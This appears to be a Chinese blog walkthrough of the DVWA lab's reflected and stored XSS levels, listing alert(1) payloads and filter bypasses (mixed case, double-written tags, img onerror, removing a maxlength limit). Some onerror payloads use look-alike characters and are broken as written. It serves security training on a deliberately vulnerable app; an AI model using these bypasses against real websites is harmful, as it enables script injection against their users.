DVWA靶场中的xss-反射型xss、存储型xss的low、medium、high的详细通关方法

目录

1.DVWA反射型xss

(1)Low:

(2)Medium:

(3)Heigh

2.xss存储型

(1)Low:

(2)Medium

(3)Heigh


1.DVWA反射型xss

(1)Low:

输入<script>alert(1)</script>

点击submit则会有弹窗显示

(2)Medium:

输入<script>alert(1)</script>

没有弹窗显示

尝试闭合,输入"><script>alert(1)</script>

也没有弹窗显示

点击这个查看源代码

发现<script>被丢掉了,因此考虑大小写

输入"><sCript>alert(1)</scRipt>

有弹窗显示

尝试使用<img>标签

输入<img src=# οnerrοr=alert(1)>=

有弹窗显示

尝试双写绕过

<scr<script>ipt>alert(1)</scr<script>ipt>

也有弹窗显示

用html编码绕过进行尝试

<script>alert(1)</script>

没有弹窗显示

(3)Heigh

输入<script>alert(1)</script>

没有弹窗显示

尝试闭合,输入"><script>alert(1)</script>

也没有弹窗显示

点击这个查看源代码

包含/<script>任意一个字母就会被丢掉

所以不能使用<script>标签去做

所以尝试用<img>

输入<img src=# οnerrοr=alert(1)>

有弹窗显示

2.xss存储型

(1)Low:

输入<script>alert(1)</script>

有弹窗显示

(2)Medium

输入<script>alert(1)</script>

点击提交

没有弹窗

尝试大小写,双写,img,HTML编码均没有反应

那么就尝试换个方向

去改变它的name,尝试在name中注入xss

因为查看源代码时发现neme的长度最大时10

那么我们则需要去修改源代码把maxlength删除,删除之后再在name插入xss代码

考虑大小写

输入"><sCript>alert(1)</scRipt>

有弹窗显示

尝试使用<img>标签

输入<img src=# οnerrοr=alert(1)>

有弹窗显示

尝试双写绕过

<scr<script>ipt>alert(1)</scr<script>ipt>

也有弹窗显示

用html编码绕过进行尝试

<script>alert(1)</script>

html 复制代码
&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;

没有弹窗显示

(3)Heigh

与中级同理在尝试从message注入不成功后,便转为在name上面注入

尝试用img标签注入

<img src=# οnerrοr=alert(1)>

有弹窗显示

相关推荐
天平12 分钟前
油猴脚本创建webworker踩坑记录
前端·javascript·typescript
原则猫2 小时前
前端基础大厦
前端
陈随易3 小时前
编程语言级别的Skill市场,AI Agent 的未来形态
前端·后端·程序员
SoaringHeart4 小时前
Flutter进阶:基于 EasyRefresh 的下拉刷新封装 n_easy_refresh_mixin.dart
前端·flutter
IT_陈寒6 小时前
Vite的热更新突然不香了,排查三小时差点砸键盘
前端·人工智能·后端
子兮曰6 小时前
Agency-Agents 深度解析:400+ AI 专家的"梦之队"如何重塑开发工作流
前端·后端·vibecoding
山河木马6 小时前
渲染管线-计算得到gl_Position(顶点着色器)之后续GPU流程
javascript·webgl·图形学
竹林8187 小时前
用 The Graph 查询链上数据实战:从手搓 RPC 到 Subgraph,我的 NFT 项目数据加载快了 10 倍
前端·javascript
妙码生花7 小时前
从 PHP 到 AI + Golang,程序员自救转型手记(十九):点选验证码代码逐行目检
前端·后端·go
Awu12278 小时前
⚡从零开发 Agent CLI(五)实现一个可治理、可扩展的工具系统
前端·人工智能·claude